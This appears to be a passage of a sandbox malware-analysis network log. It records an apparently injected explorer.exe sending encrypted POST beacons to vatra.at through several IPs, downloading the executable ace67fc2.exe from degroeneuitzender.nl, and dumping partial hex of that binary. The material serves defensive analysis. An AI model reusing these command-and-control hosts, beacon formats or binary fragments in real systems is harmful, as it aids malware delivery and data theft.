Jan 3, 2023 09:46:56.467057943 CET	820	OUT	Data Raw: 3b 6e 55 15 f7 bf 6a 2f ae ad b5 00 03 75 0b bb 0d 79 bb e0 6e 04 e4 6a 08 0b 0b e7 34 c7 c7 1a ee 59 c2 5b 07 6d 50 6e ef 9a 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 30 33 db fa Data Ascii: ;nUj/uynj4Y[mPn?$`7C[zqNA -[k,vu03mLwzw4X565r9u;7xv!:IhqA=;u\|:);`"Cwt +[9f"lrCy`sQEk
Jan 3, 2023 09:46:57.028589010 CET	821	IN	HTTP/1.0 404 Not Found Date: Tue, 03 Jan 2023 08:46:56 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 331 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.5	49717	58.235.189.192	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 3, 2023 09:46:57.365504026 CET	822	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bmjduhjgq.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 265 Host: vatra.at
Jan 3, 2023 09:46:57.365545034 CET	822	OUT	Data Raw: 3b 6e 55 15 f7 bf 6a 2f ae ad b5 00 03 75 0b bb 0d 79 bb e0 6e 04 e4 6a 08 0b 0b e7 34 c7 c7 1a ee 59 c2 5b 07 6d 50 6e ef 9a 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 3f 02 c2 95 Data Ascii: ;nUj/uynj4Y[mPn?*$`7C[zqNA -[k,vu?H[LDx[\|Er4U<t!B#N+<[AbYB]nYxVW_92ZpC%C\,Ucg=B
Jan 3, 2023 09:46:58.582076073 CET	830	IN	HTTP/1.0 404 Not Found Date: Tue, 03 Jan 2023 08:46:57 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 331 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.5	49719	175.120.254.9	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 3, 2023 09:46:58.922198057 CET	831	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bagetn.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 118 Host: vatra.at
Jan 3, 2023 09:46:58.922215939 CET	831	OUT	Data Raw: 3b 6e 55 15 f7 bf 6a 2f ae ad b5 00 03 75 0b bb 0d 79 bb e0 6e 04 e4 6a 08 0b 0b e7 34 c7 c7 1a ee 59 c2 5b 07 6d 50 6e ef 9a 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 44 41 c4 f8 Data Ascii: ;nUj/uynj4Y[mPn?*$`7C[zqNA -[k,vuDATiv\`\|'k"/fN[
Jan 3, 2023 09:46:59.847616911 CET	832	IN	HTTP/1.0 404 Not Found Date: Tue, 03 Jan 2023 08:46:59 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 331 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.5	49720	211.171.233.126	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 3, 2023 09:47:00.357947111 CET	833	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bdiba.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 349 Host: vatra.at
Jan 3, 2023 09:47:00.357969046 CET	833	OUT	Data Raw: 3b 6e 55 15 f7 bf 6a 2f ae ad b5 00 03 75 0b bb 0d 79 bb e0 6e 04 e4 6a 08 0b 0b e7 34 c7 c7 1a ee 59 c2 5b 07 6d 50 6e ef 9a 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 66 30 d3 eb Data Ascii: ;nUj/uynj4Y[mPn?*$`7C[zqNA -[k,vuf0rp/d-`d~9>Ie?K.o_J0=s7d&_6dbR8SP~jSG"qdCG1D+
Jan 3, 2023 09:47:01.673994064 CET	834	IN	HTTP/1.0 404 Not Found Date: Tue, 03 Jan 2023 08:47:00 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 331 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49714	5.135.247.111	443	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-03 08:46:54 UTC	0	OUT	GET /systems/index.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: degroeneuitzender.nl
2023-01-03 08:46:54 UTC	0	IN	HTTP/1.1 200 OK Date: Tue, 03 Jan 2023 08:46:54 GMT Server: Apache Content-Description: File Transfer Content-Disposition: attachment; filename=ace67fc2.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public Connection: close Transfer-Encoding: chunked Content-Type: application/octet-stream
2023-01-03 08:46:54 UTC	0	IN	Data Raw: 32 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 12 00 3d e2 73 6e 6e e2 73 6e 6e e2 73 6e 6e fc 21 ea 6e c6 73 6e 6e fc 21 fb 6e fb 73 6e 6e fc 21 ed 6e 95 73 6e 6e c5 b5 15 6e e7 73 6e 6e e2 73 6f 6e 8d 73 6e 6e fc 21 e4 6e e3 73 6e 6e fc 21 fa 6e e3 73 6e 6e fc 21 ff 6e e3 73 6e 6e 52 69 63 68 e2 73 6e 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 66 Data Ascii: 2000MZ@!L!This program cannot be run in DOS mode.$=snnsnnsnn!nsnn!nsnn!nsnnnsnnsonsnn!nsnn!nsnn!nsnnRichsnnPELf
2023-01-03 08:46:54 UTC	8	IN	Data Raw: 83 01 00 75 20 8d 45 fc 50 8d 85 fc f7 ff ff 50 ff 15 14 10 40 00 56 ff 15 18 10 40 00 56 56 ff 15 24 10 40 00 4f 75 d1 68 ac 25 40 00 ff 15 28 10 40 00 e8 9b fe ff ff 5f 5e c9 c3 81 ec 54 01 00 00 56 33 f6 83 3d 04 99 47 00 20 57 75 4a 56 ff 15 5c 11 40 00 56 ff 15 1c 10 40 00 56 ff 15 10 10 40 00 56 ff 15 48 10 40 00 56 56 ff 15 08 10 40 00 56 56 ff 15 14 10 40 00 56 56 e8 32 0e 00 00 56 56 e8 2b 0e 00 00 59 59 89 74 24 04 89 34 24 e8 69 fb ff ff dd d8 33 ff 56 56 ff 15 5c 10 40 00 56 ff 15 3c 10 40 00 56 56 56 56 ff 15 2c 10 40 00 81 ff de 81 24 00 0f 8d 93 0d 00 00 c7 84 24 58 01 00 00 ba 25 35 20 c7 84 24 b8 00 00 00 11 23 67 29 c7 44 24 54 2f 7e c1 16 c7 84 24 cc 00 00 00 6c d4 37 4b c7 44 24 1c 19 54 be 71 c7 44 24 3c 67 23 6f 2a c7 84 24 2c 01 00 Data Ascii: u EPP@V@VV$@Ouh%@(@_^TV3=G WuJV\@V@V@VH@VV@VV@VV2VV+YYt$4$i3VV\@V<@VVVV,@$$X%5 $#g)D$T/~$l7KD$TqD$<g#o*$,
2023-01-03 08:46:54 UTC	8	IN	Data Raw: 0d 0a Data Ascii:
2023-01-03 08:46:54 UTC	8	IN	Data Raw: 32 30 30 30 0d 0a 24 b0 00 00 00 f4 2e d1 5e c7 84 24 a4 00 00 00 5a e4 f0 76 c7 84 24 e0 00 00 00 87 47 9e 2b c7 44 24 60 0a 87 71 68 c7 44 24 7c cb be b6 67 c7 84 24 3c 01 00 00 ef c4 3c 70 c7 44 24 64 c1 68 9d 3a c7 44 24 74 45 6a ea 5e c7 84 24 48 01 00 00 5b b1 99 69 c7 84 24 40 01 00 00 02 9c 30 2c c7 44 24 58 8f 6c ac 14 c7 84 24 44 01 00 00 2e 8d ee 7e c7 84 24 dc 00 00 00 36 0d 7f 54 c7 84 24 fc 00 00 00 f5 91 d2 70 c7 44 24 08 7d 56 9b 20 c7 84 24 10 01 00 00 55 14 da 16 c7 84 24 08 01 00 00 cc 44 e4 1a c7 44 24 30 8a 6c 51 41 c7 44 24 50 a4 95 a8 75 c7 84 24 a8 00 00 00 b7 1d 56 15 c7 44 24 5c c8 d9 30 37 c7 44 24 14 34 f6 dd 30 c7 84 24 e4 00 00 00 42 e5 92 78 c7 84 24 d8 00 00 00 84 05 17 5f c7 84 24 d0 00 00 00 ea e1 c4 33 c7 84 24 9c 00 00 Data Ascii: 2000$.^$Zv$G+D$`qhD$\|g$<<pD$dh:D$tEj^$H[i$@0,D$Xl$D.~$6T$pD$}V $U$DD$0lQAD$Pu$VD$\07D$40$Bx$_$3$
2023-01-03 08:46:54 UTC	16	IN	Data Raw: c3 dd d8 dd d8 d9 Data Ascii:
2023-01-03 08:46:54 UTC	16	IN	Data Raw: 0d 0a Data Ascii:
2023-01-03 08:46:54 UTC	16	IN	Data Raw: 32 30 30 30 0d 0a e8 c3 db bd 62 ff ff ff db ad 62 ff ff ff f6 85 69 ff ff ff 40 74 08 c6 85 70 ff ff ff 07 c3 c6 85 70 ff ff ff 01 dc 05 c4 14 41 00 c3 d9 c9 db bd 62 ff ff ff db ad 62 ff ff ff f6 85 69 ff ff ff 40 74 09 c6 85 70 ff ff ff 07 eb 07 c6 85 70 ff ff ff 01 de c1 c3 db bd 62 ff ff ff db ad 62 ff ff ff f6 85 69 ff ff ff 40 74 20 d9 c9 db bd 62 ff ff ff db ad 62 ff ff ff f6 85 69 ff ff ff 40 74 09 c6 85 70 ff ff ff 07 eb 07 c6 85 70 ff ff ff 01 de c1 c3 dd d8 dd d8 db 2d b0 14 41 00 80 bd 70 ff ff ff 00 7f 07 c6 85 70 ff ff ff 01 0a c9 c3 0a c9 74 02 d9 e0 c3 cc cc cc cc cc cc db 6c 24 10 db 6c 24 04 8b 44 24 08 03 c0 0f 83 86 00 00 00 35 00 00 00 0e a9 00 00 00 0e 74 03 de f9 c3 c1 e8 1c 80 b8 e0 14 41 00 00 75 03 de f9 c3 8b 44 24 0c 25 ff 7f Data Ascii: 2000bbi@tppAbbi@tppbbi@t bbi@tpp-Apptl$l$D$5tAuD$%
2023-01-03 08:46:54 UTC	24	IN	Data Raw: 39 75 04 8b c1 eb Data Ascii: 9u
2023-01-03 08:46:54 UTC	24	IN	Data Raw: 0d 0a Data Ascii:
2023-01-03 08:46:54 UTC	24	IN	Data Raw: 32 30 30 30 0d 0a 02 33 c0 85 c0 74 0a 8b 58 08 89 5d fc 85 db 75 07 33 c0 e9 fb 00 00 00 83 fb 05 75 0c 83 60 08 00 33 c0 40 e9 ea 00 00 00 83 fb 01 0f 84 de 00 00 00 8b 4e 60 89 4d f8 8b 4d 0c 89 4e 60 8b 48 04 83 f9 08 0f 85 b8 00 00 00 8b 0d 50 18 41 00 8b 3d 54 18 41 00 8b d1 03 f9 3b d7 7d 24 6b c9 0c 8b 7e 5c 83 64 39 08 00 8b 3d 50 18 41 00 8b 1d 54 18 41 00 42 03 df 83 c1 0c 3b d3 7c e2 8b 5d fc 8b 00 8b 7e 64 3d 8e 00 00 c0 75 09 c7 46 64 83 00 00 00 eb 5e 3d 90 00 00 c0 75 09 c7 46 64 81 00 00 00 eb 4e 3d 91 00 00 c0 75 09 c7 46 64 84 00 00 00 eb 3e 3d 93 00 00 c0 75 09 c7 46 64 85 00 00 00 eb 2e 3d 8d 00 00 c0 75 09 c7 46 64 82 00 00 00 eb 1e 3d 8f 00 00 c0 75 09 c7 46 64 86 00 00 00 eb 0e 3d 92 00 00 c0 75 07 c7 46 64 8a 00 00 00 ff 76 64 6a Data Ascii: 20003tX]u3u`3@N`MMN`HPA=TA;}$k~\d9=PATAB;\|]~d=uFd^=uFdN=uFd>=uFd.=uFd=uFd=uFdvdj
2023-01-03 08:46:54 UTC	32	IN	Data Raw: 20 41 00 74 68 8b Data Ascii: Ath
2023-01-03 08:46:54 UTC	32	IN	Data Raw: 0d 0a Data Ascii:
2023-01-03 08:46:54 UTC	32	IN	Data Raw: 32 30 30 30 0d 0a 86 b0 00 00 00 3b c3 74 5e 39 18 75 5a 8b 86 b8 00 00 00 3b c3 74 17 39 18 75 13 50 e8 87 f5 ff ff ff b6 bc 00 00 00 e8 e0 3c 00 00 59 59 8b 86 b4 00 00 00 3b c3 74 17 39 18 75 13 50 e8 66 f5 ff ff ff b6 bc 00 00 00 e8 7a 3c 00 00 59 59 ff b6 b0 00 00 00 e8 4e f5 ff ff ff b6 bc 00 00 00 e8 43 f5 ff ff 59 59 8b 86 c0 00 00 00 3b c3 74 44 39 18 75 40 8b 86 c4 00 00 00 2d fe 00 00 00 50 e8 22 f5 ff ff 8b 86 cc 00 00 00 bf 80 00 00 00 2b c7 50 e8 0f f5 ff ff 8b 86 d0 00 00 00 2b c7 50 e8 01 f5 ff ff ff b6 c0 00 00 00 e8 f6 f4 ff ff 83 c4 10 8d be d4 00 00 00 8b 07 3d e8 1f 41 00 74 17 39 98 b4 00 00 00 75 0f 50 e8 60 3a 00 00 ff 37 e8 cf f4 ff ff 59 59 8d 7e 50 c7 45 08 06 00 00 00 81 7f f8 d0 1d 41 00 74 11 8b 07 3b c3 74 0b 39 18 75 07 50 Data Ascii: 2000;t^9uZ;t9uP<YY;t9uPfz<YYNCYY;tD9u@-P"+P+P=At9uP`:7YY~PEAt;t9uP
2023-01-03 08:46:54 UTC	40	IN	Data Raw: 83 e1 fd 0b cb eb Data Ascii:
2023-01-03 08:46:54 UTC	40	IN	Data Raw: 0d 0a Data Ascii:
2023-01-03 08:46:54 UTC	40	IN	Data Raw: 32 30 30 30 0d 0a f0 8b 45 08 83 20 fc 8b 06 b9 00 03 00 00 23 c1 74 20 3d 00 02 00 00 74 0c 3b c1 75 22 8b 45 08 83 20 e3 eb 1a 8b 45 08 8b 08 83 e1 e7 83 c9 04 eb 0b 8b 45 08 8b 08 83 e1 eb 83 c9 08 89 08 8b 45 08 8b 4d 14 c1 e1 05 33 08 81 e1 e0 ff 01 00 31 08 8b 45 08 09 58 20 39 7d 20 8b 45 08 8b 7d 1c 74 26 83 60 20 e1 8b 45 18 d9 00 8b 45 08 d9 58 10 8b 45 08 09 58 60 8b 45 08 83 60 60 e1 d9 07 8b 45 08 d9 58 50 eb 34 8b 48 20 83 e1 e3 83 c9 02 89 48 20 8b 45 18 dd 00 8b 45 08 dd 58 10 8b 45 08 09 58 60 8b 45 08 8b 48 60 83 e1 e3 83 c9 02 89 48 60 dd 07 8b 45 08 dd 58 50 e8 07 03 00 00 8d 45 08 50 53 6a 00 ff 75 10 ff 15 24 11 40 00 8b 4d 08 f6 41 08 10 74 03 83 26 fe f6 41 08 08 74 03 83 26 fb f6 41 08 04 74 03 83 26 f7 f6 41 08 02 74 03 83 26 ef Data Ascii: 2000E #t =t;u"E EEEM31EX 9} E}t&` EEXEX`E``EXP4H H EEXEX`EH`H`EXPEPSju$@MAt&At&At&At&
2023-01-03 08:46:54 UTC	48	IN	Data Raw: cc cc cc cc cc cc Data Ascii:
2023-01-03 08:46:54 UTC	48	IN	Data Raw: 0d 0a Data Ascii:
2023-01-03 08:46:54 UTC	48	IN	Data Raw: 32 30 30 30 0d 0a 55 8b ec 57 8b 7d 08 33 c0 83 c9 ff f2 ae 83 c1 01 f7 d9 83 ef 01 8a 45 0c fd f2 ae 83 c7 01 38 07 74 04 33 c0 eb 02 8b c7 fc 5f c9 c3 8b ff 55 8b ec 83 ec 18 53 56 ff 75 0c 8d 4d e8 e8 56 7a ff ff 8b 5d 08 be 00 01 00 00 3b de 73 54 8b 4d e8 83 b9 ac 00 00 00 01 7e 14 8d 45 e8 50 6a 01 53 e8 7a db ff ff 8b 4d e8 83 c4 0c eb 0d 8b 81 c8 00 00 00 0f b7 04 58 83 e0 01 85 c0 74 0f 8b 81 cc 00 00 00 0f b6 04 18 e9 a3 00 00 00 80 7d f4 00 74 07 8b 45 f0 83 60 70 fd 8b c3 e9 9c 00 00 00 8b 45 e8 83 b8 ac 00 00 00 01 7e 31 89 5d 08 c1 7d 08 08 8d 45 e8 50 8b 45 08 25 ff 00 00 00 50 e8 05 c4 ff ff 59 59 85 c0 74 12 8a 45 08 6a 02 88 45 fc 88 5d fd c6 45 fe 00 59 eb 15 e8 9e 76 ff ff c7 00 2a 00 00 00 33 c9 88 5d fc c6 45 fd 00 41 8b 45 e8 6a 01 Data Ascii: 2000UW}3E8t3_USVuMVz];sTM~EPjSzMXt}tE`pE~1]}EPE%PYYtEjE]EYv*3]EAEj
2023-01-03 08:46:54 UTC	56	IN	Data Raw: 4d de 75 07 66 89 Data Ascii: Muf
2023-01-03 08:46:54 UTC	56	IN	Data Raw: 0d 0a Data Ascii:
2023-01-03 08:46:54 UTC	56	IN	Data Raw: 31 66 66 38 0d 0a 45 de 42 eb 0e 66 ff 45 de eb 08 ff 45 da eb 03 ff 45 d6 b8 ff 7f 00 00 66 3b d0 72 23 33 c0 33 c9 66 39 45 90 89 45 c8 0f 94 c1 89 45 c4 49 81 e1 00 00 00 80 81 c1 00 80 ff 7f 89 4d cc eb 3b 66 8b 45 d6 0b 55 90 66 89 45 c4 8b 45 d8 89 45 c6 8b 45 dc 89 45 ca 66 89 55 ce eb 1e 33 c0 66 85 f6 0f 94 c0 83 65 c8 00 48 25 00 00 00 80 05 00 80 ff 7f 83 65 c4 00 89 45 cc 83 7d ac 00 0f 85 3c fd ff ff 8b 45 cc 0f b7 4d c4 8b 75 c6 8b 55 ca c1 e8 10 eb 2f c7 45 94 04 00 00 00 eb 1e 33 f6 b8 ff 7f 00 00 ba 00 00 00 80 33 c9 c7 45 94 02 00 00 00 eb 0f c7 45 94 01 00 00 00 33 c9 33 c0 33 d2 33 f6 8b 7d 88 0b 45 8c 66 89 0f 66 89 47 0a 8b 45 94 89 77 02 89 57 06 8b 4d fc 5f 5e 33 cd 5b e8 d7 71 ff ff c9 c3 90 be e6 40 00 12 e7 40 00 68 e7 40 00 9b Data Ascii: 1ff8EBfEEEf;r#33f9EEEIM;fEUfEEEEEfU3feH%eE}<EMuU/E33EE3333}EffGEwWM_^3[q@@h@
2023-01-03 08:46:54 UTC	64	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2023-01-03 08:46:54 UTC	64	IN	Data Raw: b7 00 00 00 11 00 00 00 ce 00 00 00 02 00 00 00 d7 00 00 00 0b 00 00 00 18 07 00 00 0c 00 00 00 0c 00 00 00 08 00 00 00 60 9a 47 00 00 00 00 00 60 9a 47 00 01 01 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: `G`G
2023-01-03 08:46:54 UTC	72	IN	Data Raw: 0d 0a Data Ascii:
2023-01-03 08:46:54 UTC	72	IN	Data Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 